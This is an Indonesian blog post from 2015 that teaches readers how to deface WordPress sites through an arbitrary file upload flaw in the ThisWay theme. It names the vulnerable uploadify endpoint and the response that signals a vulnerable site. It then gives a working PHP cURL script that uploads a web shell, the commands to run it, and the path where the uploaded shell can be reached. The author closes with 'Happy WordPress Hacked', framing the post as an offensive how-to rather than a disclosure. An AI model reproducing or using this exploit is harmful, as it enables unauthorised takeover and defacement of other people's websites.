Sunday, 20 September 2015

Tutorial Deface dengan WordPress ThisWay Arbitrary File Upload


Hallo Fans ,Nuenomaru disini .-.
maaf baru bisa posting/share artikel tutorial lagi
lg sibuk urus masadepan *asiikk wkwkwk
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Wordpress
kali ini Nue akan share Exploit Tutorial deface dengan WordPress ThisWay Arbitrary File Upload,  etthoo,, ini exploit gak begitu baru loh .. *exploit lama wkwk

hahaha iseng2 aja share kali aja masih crotz

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) 


Langsung intip Tutorialnya

#- Title: WordPress ThisWay Arbitrary File Upload
#- Author: Bet0
#- Date: 11/01/2013  
#- Vendor: themeforest.net
#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#- Tested on : Windows 7
=============


Pertama Dork Pikir sendiri Mz :v xixihi

2. pilih salah satu web target yg pengen ente tusb0l pak wkwk, lalu masukan exploitnya.
exploit: /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

3. Vuln = {"status":"NOK","ERR":"This file is incorect"} atau Blank

*kurang lebih sih gituh wkwkwk *maaf kalo salah hehehe



4. Buat File Baru Berekstensi .php Contoh thisway.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn thisway.php tadi

<?php
$uploadfile="namashellente.php";
$ch = curl_init("target.crotz/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


5. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
6. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

7. jika sukses , akan muncul nama shell sobat di CMD (berupa random shell.php gitu deh) dan akan keluar lengkap link akses shell ente

{"status":"OK","imageID":12,"imageName":"settingimage_namarandomshellentenanti.php"}





8. Shell Akses: www.target.crotz/wp-content/uploads/thn/bln/settingsimage_randomnamashellente.php


done


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy WordPress Hacked !!

Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: 3XPLOI7 Bug





./Nuenomaru























Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

2 comments

kurang lebih sih begituh eheheh

#Nuenomaru


EmoticonEmoticon